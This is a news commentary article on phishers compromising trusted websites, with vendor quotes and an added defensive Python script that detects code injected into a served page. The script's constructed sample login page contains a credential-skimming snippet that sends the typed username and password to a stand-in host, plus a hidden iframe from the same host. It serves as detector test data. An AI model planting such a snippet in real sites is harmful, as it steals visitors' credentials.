In three years phishing has transformed from an unknown threat into a multi-million dollar industry; in the next stage of their evolution, phishers will be able to avoid sending spam and bypass anti-phishing tools by hijacking small parts of 'trusted' Web sites.
Why would a criminal gang go to all the trouble of creating copy-cat Web sites and then drive users to them by sending out millions of spam e-mails, when all they really have to do is hack into a 'trusted' Web site and modify its code?
OK, so hacking into a 'trusted' Web site may not be all that easy. However, as people become more savvy about phishing scams and fewer people open unsolicited e-mails, fraudsters need to find alternative ways of stealing users' banking passwords.
Last week, Websense discovered that Samsung Telecom's Web site was hosting a rather nasty Trojan horse. We understand that the Trojan wasn't a danger to people casually browsing the site but this has not yet been proven -- and suspiciously, the main page of the site remains unavailable almost a week after the attack was first reported.
If the attackers had enough access to Samsung's Web servers to upload the Trojan, it seems reasonable to assume they could also edit the site's pages, which means they could have modified the site to push malware onto visitors' computers or to capture what visitors type. This could be done by exploiting browser vulnerabilities, or, without needing a browser hole at all, by using relatively new Web 2.0 techniques such as Ajax to quietly send form data to a server the attackers control.
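As an added example (not code from the article or from any of the vendors quoted in it), this is the kind of integrity check a site owner can run against their own pages to catch exactly that scenario: it parses a known-good copy of a page and the copy currently being served, and reports any external script, inline script, iframe or inline event handler that appears only in the live version. The two sample pages, the host 203.0.113.7 and the injected snippet are constructed for illustration.

```python
"""Detect code injected into a served page by diffing it against a known-good
baseline copy.  Added example; sample pages and hosts are constructed."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ActiveContentParser(HTMLParser):
    """Collect the elements that can run code or pull in a third-party document:
    external scripts, inline scripts, iframes and on* event handler attributes."""

    def __init__(self):
        super().__init__()
        self.external_scripts = set()   # values of <script src=...>
        self.inline_scripts = set()     # sha256 of each inline <script> body
        self.frames = set()             # values of <iframe src=...>
        self.handlers = set()           # (tag, attribute, value) for on* attrs
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            if attrs.get("src"):
                self.external_scripts.add(attrs["src"])
            else:
                self._in_script = True   # body arrives via handle_data
                self._buf = []
        elif tag == "iframe" and attrs.get("src"):
            self.frames.add(attrs["src"])
        for name, value in attrs.items():
            if name.startswith("on") and value is not None:
                self.handlers.add((tag, name, value))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf).strip().encode()
            self.inline_scripts.add(hashlib.sha256(body).hexdigest())
            self._in_script = False


def fingerprint(html):
    parser = ActiveContentParser()
    parser.feed(html)
    parser.close()
    return parser


def find_injections(baseline_html, served_html, trusted_hosts):
    """Return (kind, detail) tuples for active content present in the served
    page but absent from the baseline.  Relative script URLs count as trusted;
    absolute ones are checked against trusted_hosts."""
    base = fingerprint(baseline_html)
    live = fingerprint(served_html)
    findings = []
    for src in sorted(live.external_scripts - base.external_scripts):
        host = urlparse(src).hostname
        if host is None or host in trusted_hosts:
            findings.append(("new external script", src))
        else:
            findings.append(("external script from untrusted host", src))
    for digest in sorted(live.inline_scripts - base.inline_scripts):
        findings.append(("new inline script", "sha256:" + digest[:16]))
    for src in sorted(live.frames - base.frames):
        findings.append(("new iframe", src))
    for tag, attr, value in sorted(live.handlers - base.handlers):
        findings.append(("new inline event handler", f"<{tag} {attr}={value!r}>"))
    return findings


# Constructed sample: the site's own login page as deployed...
BASELINE_HTML = """<html><head><title>Login</title>
<script src="/static/app.js"></script></head>
<body><form id="login" action="/login" method="post">
<input name="user"><input name="pass" type="password"><button>Sign in</button>
</form></body></html>"""

# ...and the same page after an intruder has added their own code to it.
SERVED_HTML = """<html><head><title>Login</title>
<script src="/static/app.js"></script>
<script src="http://203.0.113.7/s.js"></script></head>
<body><form id="login" action="/login" method="post">
<input name="user"><input name="pass" type="password"><button>Sign in</button>
</form>
<script>document.getElementById('login').addEventListener('submit', function (e) {
  new Image().src = 'http://203.0.113.7/c?u=' + e.target.user.value + '&p=' + e.target.pass.value;
});</script>
<iframe src="http://203.0.113.7/f.html" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in find_injections(BASELINE_HTML, SERVED_HTML, {"bank.example"}):
        print(f"{kind}: {detail}")
```

In practice the served copy should be fetched from outside the organisation, with a browser-like User-Agent and from more than one network, because injected code is often served only to certain visitors; and because inline scripts are matched by hash, every legitimate change to the page has to be re-baselined, which is the discipline that turns the site owner into the chokepoint rather than the victim.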
The cybercriminal underworld is well funded and employs skilled software engineers to develop and test malicious code.
In a recent interview with Trend Micro's CTO David Rand, he said: "In one case there was at least US$250,000 funding for one piece of malware. That is a lot. It means they can do QA, proper engineering development, testing and a complete product cycle... We think they are cutting edge technologies".
"Our job, as always, is to anticipate what they are going to do next and create effective countermeasures. If we try to simply play catch up we will never win," he added.
On his blog, the director of Symantec Security Response Dave Cole said that Web 2.0 technologies are attractive to fraudsters because "they leave no trace once the browser is closed and don't rely on a researcher uncovering a Godzilla-style hole in a popular Web browser... it's clear that we've only begun to see what's possible via malicious Web sites".
Tom Chan, enterprise and client services manager for Messagelabs Asia Pacific, told me that because of more educated users and improved anti-spam engines, the success rate for traditional phishing scams is likely to fall soon. By hijacking trusted Web sites, phishers could lure many more victims.
"They are trying to compromise poorly protected Web sites -- they basically go in and enter their own code into that Web server," said Chan, who explained that victims of this new phishing era would not have to do anything 'wrong' in order to get hooked.
"You have gone to a legitimate Web site, you have not made a mistake and done everything right, but then your information gets compromised... because [the phishers] have taken over servers that belong to other people," he said.
Symantec's Cole makes an important point about these new attack vectors. He said that although it will be easier for phishers to infect lots of people in a short amount of time, Web site owners will have the power to kill an attack.
"One thing I think is noteworthy of calling out is the fact that these type of attacks can impact many people quickly, but they can also be halted in short order because they have a central chokepoint: the organisation hosting the Web site or Web service in question.
"This type of attack will not have the staying power of old threats, such as Slammer, Nimda, or other worms that rely on unpatched machines and a decentralised Internet -- they may burn brightly, but should extinguish quickly as well," he said.
However, this will be no consolation to people who find their bank accounts cleared out despite following the advice of security experts: deploying patches, using the latest security software and only visiting 'safe' Web sites.